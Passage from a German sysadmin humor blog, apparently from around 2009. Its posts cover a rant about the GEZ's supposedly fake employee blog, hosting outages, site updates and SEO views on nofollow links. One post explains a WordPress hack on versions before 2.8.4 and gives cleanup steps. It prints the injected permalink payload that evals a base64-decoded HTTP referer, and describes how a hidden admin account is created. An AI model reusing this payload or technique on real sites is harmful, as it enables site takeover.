Ich sag mal so:
Es gibt Blogs in denen Leute ihren privaten Kram reinschreiben (”War gestern bei Aldi und da war’s voll doof”).
Es gibt Blogs mit bestimmten Themen.
Es gibt Blogs die als News Seite fungieren.
Es gibt Webseiten die zumindest auf Blog-Software basieren.
Es gibt Firmenblogs.
… und es gibt FAKE Blogs.

Und nun ratet doch mal zu welcher Kategorie der GEZ Blog gehört?

Ich zitiere mal die Einleitung der sogenannten Mitarbeiter Blogs:

Der Mitarbeiterblog ist unser „Tagebuch“ als GEZ-Mitarbeiter:…Wir bloggen aus Spaß an der Freude. Hinter den Blogeinträgen steht nicht die GEZ, sondern wir Mitarbeiter selbst.

Soso…ist ja nett.
Aber mal so unter uns: WEN WOLLT IHR VERARSCHEN?

Das ganze Geschreibsel im GEZ Blog ist pures Marketing. Kein Mensch schreibt so. Das ganze gehört zur Image Kampagne. Und da bei Kampagnen mit festen Zielen der Faktor “echter Mensch” einfach zu unberechenbar ist muss der halt unter den Tisch fallen.
Behaupte ich einfach mal.

Man lese sich diese “Tagebuch Einträge” bitte einmal durch.
Werbung Werbung Werbung.

Vera Z. schreibt im ersten Beitrag:

Ich freue mich über die Gelegenheit, in direkten Kontakt treten zu können, Fragen zu beantworten, Denkanstöße zu geben, zu diskutieren, zu erklären und aufzuzeigen, dass die GEZ eine super Firma ist! Hier arbeiten Menschen, die sich um jeden Brief, jedes Telefonat Gedanken machen und versuchen zu helfen…. Jedes einzelne Teilnehmerkonto ist anders, jeder Teilnehmer unterschiedlich, kein Brief wie der vorherige. Die Sachverhalte erfordern oft „Sherlock Holmes Qualitäten“.

Ja ne is klaa Sherlock.

Besser wird’s mit Daniela K. die davon erzählt wie sie einen netten Mann auf einer Party kennengelernt hat der sie angesprochen hat weil sie bei der GEZ arbeitet.
Sie beendet ihren Beitrag so:

Ich hätte nie gedacht, dass mein Job derartiges Interesse bei meinen Mitmenschen wecken könnte. Die geschilderte Situation ist kein Einzelfall. Wenn Ihnen mal auf einer Party der Gesprächsstoff ausgehen sollte, dann diskutieren Sie doch einfach mal über die GEZ. Sie werden überrascht sein.

Mach ich andauernd. Fokussiert den gesamten Hass aller anwesenden auf das Selbe.
Und natürlich ist es verwunderlich, dass Mitmenschen ein reges Interesse an der Arbeit der GEZ haben… wenn man seit 10 Jahren hinter’m Mond lebt und nicht mitbekommen hat, dass die GEZ in Deutschland auf der Unbeliebtheits-Skala noch vor Osama Bin Laden steht.

Sieht Anja M. natürlich nicht so.

Es mag vielleicht seltsam klingen, aber es ist ein interessanter, vielseitiger Job, der ganz bestimmt nie langweilig wird!

Ich weiß ganz genau, welche Themen den Rundfunkteilnehmern unter den Nägeln brennen und freue mich, dass wir hier zusammenkommen, um regen Meinungsaustausch zu pflegen und natürlich auch zu diskutieren. Daher hab ich auch sofort “hier” gerufen, als es darum ging, einen Webblog zu starten.

An dieser Stelle sie mal kurz angemerkt, dass es zwar schon einige Kommentare gibt aber noch keine einzige Antwort. Der selbe Einbahnstrassendialog wie schon im GEZ Forum.

Neuster Eintrag von heute von Conny A. handelt vom Abmelden.
Kurz zusammengefasst: Ist doch alles total unkompliziert.

Ja, ich finde objektorientierte Programmierung mit PHP 5.3 auf MVC Basis und Anbindung an eine PostgreSQL Datenbank auch nicht kompliziert. Ich mach den scheiss aber auch dauernd.

LIebe Leute von der GEZ: Benennt das Ding um in eine FAQ oder sonst was. Aber hört auf diesen Marketingscheiss Blog zu nennen. Wenn ihr jetzt auch noch versucht im Netz die Leute zu verarschen werden diese nämlich ganz schön sauer. Und das ist wohl kaum das was ihr mit eurer Image Kampagne erreichen wollt.

Und nehmt auch gleich eure bezahlten Postings aus eurem Forum. Meint ihr etwa es merkt keiner, wenn im Forum rein zufällig genau die Leute die sich nach dem Namensschema “vorname .X” benannt haben Lobgesänge auf die GEZ anstimmen und dann auch rein zufällig auch so einen komischen Werbe-Schreibstil haben?

Gehasst seid ihr eh schon, hört auf euch auch noch lächerlich zu machen.

PS: Wer sich das Eldend selbst antun möchte: Hier

%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/

Kann man sich denken, dass das nicht gut ist.

Anstatt also Battlestar Galactica zu schauen durfte ich hier sauber machen.
Aber nach einem Blick ins wordpress Support Forum stellte ich fest, dass ich nicht der einzige war.

Im folgenden die Details.

Was macht der Hack?
Durch eine Sicherheitslücke werden die Permalinks von Wordpress verändert. Durch diesen zusätzlichen Code können die Postings nicht mehr regulär abegrufen werden. Allerdings kann schädlicher Code eingefügt werden. Kann nicht nur, sondern wird weil das ganze automatisch abläuft. Nach dem Angriff wird ein neuer Benutzer in der Wordpress Administrator Gruppe erstellt. Dieser ist im Dashboard unsichtbar.
So weit war es bei mir. Bei anderen wurden auch Dateien hochgeladen und Wordpress Dateien verändert.
Da es anschliessend einen Administrator Nutzer gibt kann der natüürlich alles machen.

Wie genau funktioniert’s`?
2 Bedingungen müssen erfüllt sein: Eine Wordpress Version kleiner als 2.8.4 (die aktuellste) und Usern muss erlaubt sein sich zu registrieren. Allerdings bin ich bei letzterem nicht ganz sicher. Gut möglich, dass man auch das umgehen kann.
Zunächst werden ein paar Benutzer registriert. Simple Spam Registrationen.
Durch eine sehr üble Wordpress Sicherheitslücke ist es dem registrierten User möglich die Permalinks zu ändern und den oben genannten Code anzuhängen. Ich habe es selbst ausprobiert; da war nicht viel zu nötig. Schlimmer noch: Durch diese Sicherheitslücke können auch andere Wordpress Seiten aufgerufen und manipuliert werden die eigentlich nur dem admin vorbehalten sind. (und ich werde an dieser Stelle nen Teufel tun und sagen wie die funktioniert)
Ziwschen registrierung und verändern des Permalinks können Tage vergehen. Nachdem die Permalinks geändert wurden wird einer dieser Links aufgerufen (bei mir lagen 4 Stunden dazwischen).
Dazu wird ein gefälschter Referer übergeben. Wenn man sich den Code oben ansieht stellt man fest, dass dort der Referer encodiert und OHNE WENN UND ABER AUSGFÜHRT WIRD!!!

Den genauen Code der dort übergeben wird behalte ich erst einmal für mich. Kann man sonst zu leicht gegen aktuell infizierte verwenden.

Es werden Userdaten übergeben und zusätzlich wird noch der Inhalt einer Datei von einem chinesichen Server nachgeladen.
In dieser Text Datei steht der Code mit dem der neue Superuser angelegt wird.

Dieser hat anstelle eines Namens ebenfallls Code. Dieser ist diesmal etwas HTML und Javascript. Javascript ist nicht ganz mein Ding. Ich glaube, dass durch diesen Code verhindert wird, dass man den neuen User im Dashboard sehen kann. Da der Name dort angezeigt wird wird eben dort der Code ausgeführt.

Zudem wird die registrierung weiterer User deaktiviert. Vermutlich dammit man sich nicht über den selben Weg die Kontrolle über den Blog zurückholen kann wenn er erst einmal vollständig übernommen wurde.

Nun haben wir einen User Namens OrvalGunning70 und der ist Blog Administrator.
You have been hacked.
Und das vollautomatisch.

Cross Site Scriping aus dem Lehrbuch.

Woran erkennne ich ob ich betroffen bin?
1. An euren Permalinks hängt nun so was:

%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/

2. Ihr habt registrierte Nutzer Namens
Andrianq (e-mail vergessen zu notieren)
Miriam (obierebelominepyb@gmail.com)
MikeWink (bugbeemershonyhe@gmail.com )
OrvalGunning70 (keine e-mail) (nur in der Datenbank zu finden)

Einer dieser Nutzer reicht schon damit die Alarmsirenen angehen sollten.

Was kann ich tun wennn ich betroffen bin?
Da es noch keine 100%ige Information gibt was genau alles mit dem Superuser angestellt wird kann ich keine 100%ige Anleitung geben.

1. Schaut nach ob Wordpress Dateien (vor allem die index.php) kürzlich verändert wurden. Gängige FTP Programme wie z.B. Filezilla zeigen das Änderungsdatum an.
2. Schaut nach ob neue Dateien erstellt wurden. Vor allem im Order wp-content/uploads

Wie mit 1+2 genaue Verfahren werden muss kann ich noch nicht sagen. Bei mir trat das nicht auf.

3. Löscht den User OrvalGunning70

Da man OrvalGunning70 nicht im Dashboard sehen kann kann man dies entweder über die Datenbannk machen indem man in der tabelle wp_users schaut welche ID der Nutzer hat und folgendes ausführen (XXX durch die ID von OrvalGunning70 ersetzen):

delete from wp_users where ID=XXX;
delete from wp_usermeta where user_id=XXX;

oder aber über einen Umweg:
Da die Registrierung deaktiviert wird sollte OrvalGunning70 der letzte registrierte Benutzer sein.
Geht im Wordpress Dahsboard zur Benutzerübersicht und sucht den zuletzt registrierten Benutzer (was irgendjemand anders zu sein scheint).
Rechtsklickt auf den Link um den User zu löschen und kopiert den Link.
Fügt diesen Link nun in eure URL zeile im Browserr ein.
In der URL steht nun unter anderem so etwas:

action=delete&user=7

Die 7 (oder welche Zahl auch immer da steht) ist die benutzer ID. Diese muss um eines ehöht werden. In meinem Beispiel wäre das dann eine 8.
Anschliessend die URL aufrufen (also einfach Enter drücken)

4. Löscht folgende User, falls vorhanden:
Andrianq (e-mail vergessen zu notieren)
Miriam (obierebelominepyb@gmail.com)
MikeWink (bugbeemershonyhe@gmail.com )

Löscht am besten alle User die nicht echt zu sein scheinen.

5. Ändert eure Permalinks wieder auf was gescheites.
6. Deaktiviert die User registrierung wenn ihr sie nicht braucht. (falls ihr nicht wisst ob ihr sie braucht dann braucht ihr sie nicht)
7. Schleunigst auf Wordpress 2.8.4 updaten. Das ist die einzige Version die derzeit als sicher gilt.
8. Es ist nie verkehrt zur Sicherheit mal sämtliche Passwörter zu ändern.

Wie kann ich mich schützen?
1. Deaktiviere User registrierungen in deinem Blog.
2. Update auf Wordpress 2.8.4; jede Version darunter ist anfällig.

Ich war seit Freitag morgen nicht zuhause und das erste was ich heute lese ist, dass mein Blog down ist.

Speicherprobleme bei einem PHP Script… aber auch nach verdoppelung des Speichers ging nichts.

Irgendein Problem mit dem Cache. Das muss ich mir noch in Ruhe anschauen. Derzeit scheint es zu reichen die entsprechende Zeile in WP auszukommentieren.

Tja, ich Vollidiot hätte mal vorher etwas nachschauen sollen.

Der Error im Dashboard bei eingehenden Links ist noch zu verschmerzen.

Aber Shortcodes sind nun im Eimer. Das bedeutet, dass sämtliche (youtube) Videos hier vorerst nicht funktionieren.

Ich hoffe die geben Gas mit WP 2.8.1.
Immerhin… musste eh mal ein neues Plugin für Videos besorgen. Das alte wird nicht mehr gepflegt.

Dafür gibt’s jetzt nen Twitter Button. (der ist allerdings nicht in WP 2.8 enthalten*g*)

UPDATE: Neues Video Plugin installiert. Videos laufen nun wieder.

Dem einen oder anderen ist vieleicht aufgefallen, dass die Seite inzwischen wesentlich schneller läd als bisher. Liegt daran, dass der ganze Spass nun endlich weg von webtropia ist und bei hosteurope liegt. Die Server sind mal wesentlich besser.

Heute hab ich endlich mal Wordpress auf den neusten Stand gebracht. Scheint soweit alles zu laufen.

Im Laufe des Monats werden sich noch ein paar Dinge ändern.
Permalinkstruktur wird überarbeitet.
Im gleichen Zug werden die Tags und Kategorien ausgemistet bzw neu erstellt. Läuft momentan alles viel zu wahllos bzw in “allgemein” während andere Kategorien gar nicht mehr aktualisisert werden. Die Schwerpunkte hier haben sich halt verlagert. Keine Sorge, das wird kein weiterer Handy/Germanys Next Top Nutte/Immobilien Blog. Aber ein bischen über den Tellerand schauen muss man auch ja mal.

Vermutlich werde ich das Theme ebenfalls ändern. Das empfinde ich inziwschen als zu einschränkend. Aber da ist die finale Entscheidung noch nicht gefallen.

Ich fahre jetz bis Montag zum RockHard Festival in Gelsenkirchen.

Falls da jemand spontan ein Bierchen mit mir zischen möchte, meine Nummer steht im Impressum.

Bis die Tage.

Zufällig heute entdeckt unter den letzten Referern: “http://intern.bka.de/LaufendeErmittlungen/index.html”.

Geile Idee; für ne Sekunde hab ich wirklich doof geguckt.*g*

Ich weiss auch nicht warum aber im letzten Monat war meine Motivation hier irgendwas zu schreiben gleich Null. Ohne besonderen Grund. Einfach absolut keine Lust. Eigentlich hatte ich bis eben auch keine Lust. Und dann überkam mich das Gefühl, dass ich wieder schreiben sollte. Warum auch immer. Vieleicht brauchte ich ne winterpause. Die Fussballer haben sowas ja auch.

Ab jetzt wieder regelmäßig. Ehrlich, versprochen… ich geb mir jedenfalls Mühe.

Rutscht gut rein und nehmt euch nicht zu viel vor.
Wir lesen uns im nächsten Jahr wieder.

Eigentlich wollte ich die Woche anders starten. Und auch was anderes schreiben. Als ich eigentlich gerade anfangen wollte ging’s los. Wahnsinnig lange Antwortzeiten der Seite. Hab kurz vorher noch ein paaar Einstellungen vorgenommen. Suchte den fehler also erst mal bei mir. Also Putty auf und per SSH mal nachschauen… das lief zuerst noch, wenn auch wahnsinnig langsam und dann ging gar nichts mehr.
Hm… Bei webtropia dann mal ins webinterface gegangen um den VServer zu rebooten. Da lief aber auch nichts. Die gesamte Webtropia /Fast-IT Seite lahm wie Sau und der Punkt VServer im Menü hatte die Reaktionszeit einer Zugekifften Schildkröte.
Endlich im Menü angelangt die große Überraschung: Wo normalerweise der Status des VServers steht “Running/Stopped” stand einfach gar nichts.
Ich ging also mal davon aus, dass da ordentlich was abgeraucht ist.
Es war 3 Uhr Nachts. (hab den ganzen Sonntag gepennt und daher die Nachht zum tage gemacht).
Telefonisch erreicht man um die Uhrzeit eh niemanden und da die eigene Seite betroffen war wird man da schon bald was merken.
Gegen 8 Uhr dann zur Arbeit. Da ich doch etwas nervös wurde hab ich gegen 10 Uhr mal ein Support Ticket geöffnet. Etwa 3 Stunden soäter bekam ich auch Antwort. Das Host System meines VServers ist ausgefallen. Der Filesystem Check wird noch etwa 1-2 Stunden dauern. Nagut…
Ich kenn ja die zeitangaben im IT Sektor. Eine IT-Stunde entspricht da etwa 2-2,5 Echtzeitstunden. Daher war ich auch nicht verwundert, dass da um 17 Uhr immer noch nichts lief.
Früh schlafen gegangen und gehofft, dasss sich das nun alles regeln würde.
Dienstag: 8 Uhr morgens. Check: Immer noch nichts. Also das übertraf selbst meine IT Zeitrechnung. Wieder den Support angeschrieben. Diesmal nicht mehr ganz so freundlich. Schon geplant um 10 Uhr anzrufen und wenn mir die Antwort nicht gefallen sollte nen halben Tag Urlaub zu nehmen um mal persönlich bei Webtropia vorstelllig zu werden.
Aber gegen 10 kam dann auch eine Antwort. Hat leider etwas länger gedauert, system läuft wieder.
Tat es tatsächlich.
Ich glaube ja eher, dass die Vögel nur vergessen haben den Server wieder einzuschalten.*g*

Ich hab jedenfalls von webtropia die Schnauze voll. Das war nicht der erste Ausfall. Zudem ist der VServer auch nicht gerade der schnellste. Klar, deshalb nur V-Server aber da geht mehr.
Das wirklich enttäuschende ist, meiner Meinung nach, aber nicht der lange Ausfall. Das mal was abraucht kann passieren. Aber wenn ein System über 24 Stunden nicht verfügbar ist kann man doch wohl erwarten, das man informiert wird. Da kam keine Mail, keine News im Websystem. Ich muss den Support anschreiben um zu erfahren warum mein Server, inklusive der Webseiten und dem Mailserver darauf, nicht funktioniert. Bei 1-2 Stunden Ausfall ist das evtl noch okay aber es waren über 24 verdammte Stunden in denen hier nichts lief. Keine Info, kein gar nichts. Keine Info wie lange das noch so sein wird, nicht mal die Info, dass es überhaupt ein Problem gibt und man daran arbeitet. Das kann es echt nicht sein.

Da dies, wie gesagt, nicht das erste mal war(wennn auch noch nie so lange), hab ich die Konsequenzen gezogen und mir bereits in der Nacht von Sonntag auf Montag einen neuen VServer bei Host Europe bestellt. Die begeistern mich jetzt schon. Heute kam nämlich schon mein Aktivierungscode per Post.
Evtl ein bischen Vorschnell, da mir mein Kollege DocX gleich Angeboten hat einen VServer bei ihm zu beziehen. Vorerst hat er mir erst mal einen gesponsort. Danke dafür. Da werde ich sicherlich auch mit dem VServer bei Host Europe Verwendungsmöglichkeiten für haben.

Ein Jahr ist nun rum… Zeit für einen Rückblick.

Ich habe den Blog eigentlich aus Jux gestartet. Ich hatte halt ein paar Geschichten im Support erlebt die echt auf keine Kuhhaut gingen und fand, dass man das unbedingt der Öffentlichkeit präsentieren muss. Zudem wollte ich einfach mal selbst ein wenig SEO Erfahrung sammeln und schauen wie gut ich mein eigenes Geschreibsel denn bei Google platzieren kann.
Geschmacklich völlig in einem schwarzen Loch gefangen war das hier mein erstes Theme: http://www.wpthemespot.com/2006/12/26/burned/

Tja, was als Jux gestartet war erfreut sich nun doch einer ziemlichen Beliebtheit.
Inzwischen tummeln sich hier 200-300 Leute am Tag. Allein 179 Leute haben mein Feed in ihrem Google Reader. Nicht schlecht für ein Hobby.*g*

Ich glaube das coolste was einem passieren kann ist wenn man mit Bekannten spricht und den Namen seines Blogs nennt die Reaktion wie folgt ist “Was? Du bist das? Geil, den lese ich schon seit Monaten”. Hat was für sich und passierte mir bereits 2 mal.

Am 4.3.2008 schaffte der Blog es sogar in die News von IT-administrator.de. Das war auch der erste Besucherrekord von knapp 400 Leuten. Meinem Server hat das zu diesem Zeitpunkt gar nicht gepasst.*g*

Absoluter Rekord war 3.9.2008 mit 790 Besuchern. Google Chrome Release und anscheinend war ich der erste der nen Acid Test veröffentlicht hat.

Höchster Pagerank war bisher 5. Zumindest für dumme Gesichter von ein paar Kollegen war der gut.

Falls es wen interessiert: Einnahmen durch Adsense und Affiliate Links sind nicht der Rede wert. Dafür habe ich echt die schlechteste Zielgruppe die man sich denken kann. Aber nen vierstelligen Euro Betrag pro Monat habe ich eh nie angepeilt. (aber wenigstens zweistellig dürfte er sein…*g*)

Eigentlich wollte ich hier noch massig Statistiken posten. Da die aber a) kaum jemanden interessieren und b) mir eben erst eingefallen ist, dass ich ein paar alte Daten nicht in der Datenbank habe lass ich das.*g*

Aber, da ich das noch aus dem Kopf weiß, an dieser Stelle ein Dankeschön an Matthias von Adminlife und Björn dem Welt Held welche die ersten waren die mich, ohne Androhung körperlicher Gewalt, verlinkten und nicht aus meinem persönlichen Bekanntenkreis stammen.

Und den Jungs von Sun Microsystems und ihren Systemhelden die auch ihren Anteil daran hatten, dass ich diesen Blog gestartet habe und mir mit ihrer Blogcommunity ein super Sprungbrett lieferten.

Als kleines Schmankerl gibt es in der rechten Sidebar nun immer zu sehen was ich vor einem Jahr geschrieben habe. Eine kleine Zeitreise. Man merkt den ersten Postings schon an, dass sie mit dem Gedanken geschrieben wurden “Mich kennt keine Sau, ich kann hier rumpöbeln”. Wobei genau die Beiträge die ich einfach mal aus einer Scheiss-Laune heraus geschrieben habe fast immer die beliebtesten waren. Differenzierte Gedanken kann man wohl überall lesen.
Ich versuche mich demnächst auch wieder meiner alten Zeiten zu besinnen und dem “fiesen” im Blog Namen wieder gerechter zu werden. Macht mir auch viel mehr Spass. Dann mal auf ins nächste Jahr.

In diesem Sinne:
Benutze Kopf mit Wand…

Nun gibt es 2 neue Kategorien namens Social Networks und Suchbegriffe

Unschwer zu erraten was da so steht aber da ich ja irgendwie mehr als 2 Zeilen in diesem Beitrag haben möchte:
In der einen geht es um alles was meine “Lieblingsseiten” Myspace, StudiVZ, Facebook und co. betrifft.
Und die zweite Kategorie entällt nun endlich gesammelt die, monatlich veröffentlichten, Suchanfragen meines Blogs und vereinzelt auch mal welche die ich woanders gefunden habe. Da mir nun schon mehrfach gesagt wurde, dass die Suchbegrife die beliebsten Beiträge sind macht es Sinn die zum nachlesen mal in einer eigenen Kategorie zu sammeln.

Viel spass beim schmökern.

PS: Bestehende Links bleiben natürlich gülltig.

Es gibt immer noch viel zu viele Blogs die grundsätzlich nur mit NoFollow verlinken. Egal ob es nun aus Unwissenheit passiert oder aus Ignoranz: Das ist Mist.
NoFollow ist ein praktisches Werkzeug um die Linkliebe (geiles Wort) besser zu steuern. Aber NoFollow grundsätzlich an alle externen Links zu heften ist einfach falsch.

Für die Unwissenden:
Ein NoFollow Link ist ein für Suchmaschinen entwerteter Link. Die Suchmaschine wird ihm zwar folgen aber es erfolgt keine Wertung. Wenn eine Suchmaschine einem Link folgt wird das normalerweise als Empfehlung gewertet und die verlinkte Seite wird entsprechend besser von der Suchmaschine bewertet.
Ist grundsätzlich ja auch richtig. Wenn ich etwas verlinke tue ich das normalerweise ja auch weil ich zeigen möchte “Hier, das ist gut, da solltet ihr mal weiter lesen”. Und als kleinen Bonus zu den Besuchern die über diesen Link kommen werte ich die verlinkte Seite auch gleichzeitig für die Suchmaschinen etwas auf. Warum auch nicht?

Nun ist es leider so, dass Wordpress (und das ist nun mal das System auf dem die meisten Blogs laufen) die externen Links in Kommentaren grundsätzlich auf NoFollow setzt.
Und genau das ist der völlig falsche weg wenn man einen Blog haben möchte der auch kommentiert wird.
Wenn jemand einen Kommentar schreibt und selbst eine Seite bzw einen Blog hat wird diese automatisch verlinkt. Wordpress setzt diesen Link nun auf NoFollow. Aus Angst davor, dass zu viele Spamlinks eine Wertung bekommen.
Ich finde aber, dass grundsätzlich jeder der einen halbwegs sinnvollen Kommentar schreibt es verdient hat, dass seine Seite ordentlich verlinkt wird.
Ein Blog der nicht kommentiert wird ist tot. Kommentatoren füllen den Blog mit Leben und machen ihn interessant. Es ist daher nur fair wenn ich den Leuten die meinen Blog bereichern wenigstens einen kleinen Link zurückgebe. Und zwar einen richtigen.

Viel schlimmer ist das NoFollow verlinken aber bei Trackbacks. Wenn jemand in seinem Blog über etwas schreibt und dabei einen Link auf einen anderen Blog setzt schickt er einen Trackback. Das heißt: Der Blog der den Link gesetzt hat schreibt quasi einen Kommentar im anderen Blog und setzt einen Link zu sich selbst. So sieht man, dass ein anderer Blog etwas zum Thema geschrieben hat.
Ist der verlinkte Blog nun ein NoFollow Blog ist der Link zum bezugnehmenden Beitrag ebenfalls NoFollow. Wie assig ist das bitte? Da schreibt jemand über etwas und gibt mich als Quelle an und gibt mir einen vollwertigen Link und ich habe nicht einmal den Anstand ihm einen vollwertigen Link zurückzugeben? Es entsteht mir kein Nachteil wenn ich ebenfalls einen wertigen Link zurückgebe. Ich kriege einen Link also gebe ich auch einen zurück. Ganz einfach.

Ich verlinke grundsätzlich keine Beiträge von NoFollow Blogs. Warum sollte ich etwas verlinken, dass mir ganz bewusst den vollwertigen Gegenlink verweigert? Sollte ich es doch tun, weil der Beitrag wirklich sehr gut ist, gibt es auch nur einen NoFollow Link. Ich sehe doch nicht ein einen Blog zusätzlich aufzuwerten wenn ich nichts zurückbekomme.

NoFollow in den Kommentaren soll Spammer bzw Spambots davon abhalten die Blogs vollzumüllen.

1. Das klappt eh nicht. Die Bots kommen trotzdem.
2. Man kann diese Spamkommentare immer noch löschen bzw nicht freigeben. Es dauert eine Weile bis ein Blog die Größe erreicht hat wo das händisch zu viel Aufwand ist.
3. Mit Aksimet gibt es ein Wordpress Plugin, dass Spam in Kommentaren automatisch erkennt. Das ist bei mir seit Monaten im Einsatz und hat seitdem alle Spamkommentare erfolgreich erkannt und erst einen einzigen Kommentar fasch als Spam eingestuft (lässt sich rückgängig machen). Man muss lediglich alle paar Tage schauen was denn so an Kommentaren abgefangen wurde.

Selbst solche Mamut Blogs wie Basic Thinking schaffen es ohne NoFollow. Und da dürfte die Anzahl der Spam versuche weitaus höher sein als bei den meisten anderen Blogs. Wenn Robert das bewältigen kann dann sollten das andere Blogger auch schaffen.

Über den Sinn und Unsinn von NoFollow wurde auch beim S-O-S SEO Blog geschrieben. Klar, wird ein SEO das NoFollow Atribut niemals toll finden aber gerade das Wikipedia Beispiel dort veranschaulicht gut wieso NoFollow scheisse ist.

Also, seid nicht länger egoistisch und entfernt den NoFollow Dreck aus euren Blogs.
Zum Beispiel mit dem Do Follow Plugin oder einem anderen. Da gibt es einige.

Ich werde demnächst auch das CommentLuv Plugin ausprobieren, mit dem nicht nur ein Link zu einem Blog gesetzt wird sondern auch versucht wird den letzten Blogeintrag zu verlinken. Ich finde das ist ne tolle Sache.

Und das was ich derzeit an Freizeit habe muss/will ich in andere Sachen investieren.  In Kürze geht es aber in alter Frische weiter. 

Ich arbeite bereits an Optimierungsmassnahmen. Daher kann es demnächst mal zu kurzen Aussetzern durch Restarts (oder Vertipper im Code ) kommen.

Da ich demnächst noch ein größeres Webprojekt betreuen werde komme ich auf lange Sicht wohl auch nicht um ein Serverupgrade herum.  Wer nicht erst seit gestern seinen AOL Zugang hat weiss ja wohl wo er hier mal hinklicken kann um mir 1-2 Cent zwecks Finanzierung zu spendieren.

Also wie ich immer sage: Das problem ist bekannt, ich arbeite bereits daran. (was das auf deutsch heisst werde ich in den nächsten Tagen mal erleutern) 

Mit dem I3Theme dürfte ich nun aber das passende Theme für Wordpress gefunden haben. Natürlich hab ich das ganze noch etwas angepasst und modifiziert. Links aufgeteilt, bischen SEO zeugs, das Übliche halt.
Nein, das Grunddesign ist absolut original…weil mir genau das gefiel.

Ich hab die Optik im aktuellen Firefox, Opera, im IE7 und im IE6 getestet. Sollte alles funktionieren. Wer Fehler(insbesondere in anderen Browsern) findet darf sich gerne bei mir melden. Wie immer die an dieser Stelle die Admin Klausel: Das heisst nicht, dass ich auch darauf reagiere.

IE 5.5 Benutzer und Leute mit 800×600 Bildschirmauflösung sind leider raus. Kommt mal rüber in das 21. Jahrhundert…

Die Boxen in den Sidebars lassen sich übrigens individuell verschieben bzw ganz schliessen. (allerdings funktioniert das Verschieben nicht von einer Sidebar in die andere). Vorsicht: Kann , je nach Browser, zu Problemen führen.

In den nächsten Tagen werd ich sicherlich noch ein wenig weiter basteln. Also nicht wundern wenn es hier zwischenzeitlich mal etwas komisch aussieht.

Natürlich geht es hier bald weiter. Aber auch ein Admin brauch mal Urlaub und den habe ich mir gegönnt. Da entsprechend der Jahreszeit auch fast alle anderen ihren Urlaub verballert haben bzw noch dabei sind, gab es natürlich nichts zu erzählen. Und derzeit ist meine Zeit auch etwas begrenzt. Genaugenommen erfreue ich mich gerade an meinem neuen Rechner und peppe den Server ein wenig auf. Aber keine Sorge, schon bald gibt es hier wieder neue Annekdoten und Funde des fiesen Admins. Es kommen auch wieder neue Mitarbeiter die vermutlich noch nicht wissen, dass sie mit ihrem Telefon gerne alles machen können ausser meine Nummer zu wählen. Das werden die aber schon recht schnell lernen.

Wenn du das hier lesen kannst dann bist du entweder ein gelangweilter Admin, ein Programmierer, ein Nerd oder ein einfacher Anwender der sich gerade am Maximum seiner technischen Kompetenz bewegt und im Internet surft. Falls letzteres zutrifft: Herzlichen Glückwunsch, bis jetzt hast du noch nichts kaputt gemacht. Hoffen wir, dass das so bleibt.

Was soll das alles hier?

Wer schon mal für das Netzwerk eines Unternehmens verantwortlich war und zu allem Überfluss auch noch ein angeschlossenes Telefon besitzt, dessen Nummer den Anwendern im Unternehmen bekannt ist, kennt es: Das Verlangen laut zu schreien! Das Verlangen einfach loszubrüllen: “Drück halt den Reset Knopf du Idiot!”, “Geh mir nicht auf den Sack mit der Scheiße!”, “Bitte fass den PC nicht mehr an, er hat dir doch gar nichts getan!”.

Da meine Stimmbänder das nicht mehr lange mitmachen ist dies hier mein virtueller Schrei. Ein Schrei Richtung Anwender, er möge mich doch einfach in Ruhe lassen. Ein Schrei an die anderen Admins, als Warnung vor dem DAU. Ein Schrei an alle anderen, als spaßiger Zeitvertreib für Zwischendurch.

Ich bin geboren um regeln
Ich bin gekommen um zu fixen
Ich bin der Herscher über die Netze
Ich bin das Alpha und das Omega
Ich bin das Auge das Alles sieht
Ich bin hart, ich bin unerbittlich, ich bin fies

Ich bin der Admin